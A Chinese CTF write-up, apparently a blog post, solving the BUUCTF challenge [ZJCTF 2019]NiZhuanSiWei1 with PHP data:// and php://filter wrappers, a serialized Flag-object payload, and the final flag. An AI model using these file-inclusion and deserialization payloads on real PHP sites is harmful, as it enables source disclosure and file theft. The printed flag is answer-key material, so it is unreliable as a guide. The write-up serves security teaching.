web buuctf [ZJCTF 2019]NiZhuanSiWei1

web buuctf [ZJCTF 2019]NiZhuanSiWei1_第1张图片

一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 ,

php伪协议是基于文件包含的,文件包含有本地包含和远程包含,

当包含的文件在远程服务器上时,就形成了远程文件包含。

远程文件包含需要在 php.ini 中设置:

allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)

php伪协议是php支持的协议和封装协议

贴(我从微博里找的,大致内容都有写):

web buuctf [ZJCTF 2019]NiZhuanSiWei1_第2张图片

1.条件 file_get_contents($text,'r')==="welcome to the zjctf",

利用在线base4编码工具对welcome to the zjctf进行编码,得到

利用data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

web buuctf [ZJCTF 2019]NiZhuanSiWei1_第3张图片

2.web buuctf [ZJCTF 2019]NiZhuanSiWei1_第4张图片 

if里的正则匹配表示file和flag有关系,include()是在php里面调用php文件,从注释里可以看出来调用的是useless.php,根据下面的代码,需要看到useless.php,于是令

file=php://filter/read=convert.base64-encode/resource=useless.php 

(不用这个伪协议,useless.php文件直接运行,不会有返回源码,使用伪协议会将源码进行返回)

web buuctf [ZJCTF 2019]NiZhuanSiWei1_第5张图片

将下面的base64解码,得到


class Flag{ //flag.php
public $file;
public function __tostring()
  {
    if(isset($this->file))
      {echo file_get_contents($this->file);
       echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>

 3.引用的FLAG类,根据注释flag.php,里面的文件是flag.php,我们还需要知道password的值是什么,根据后面的代码,password应该是序列化后的值,这个是就是Flag类下的flag.php,于是序列化后为O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}这就是password的值

4.构造payload:

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";},进入界面查看源码,可以得到flag

flag{c77bdfc1-8a0f-4ce8-950a-4cdf2f97046d}

你可能感兴趣的:(php,安全,php伪协议,反序列化)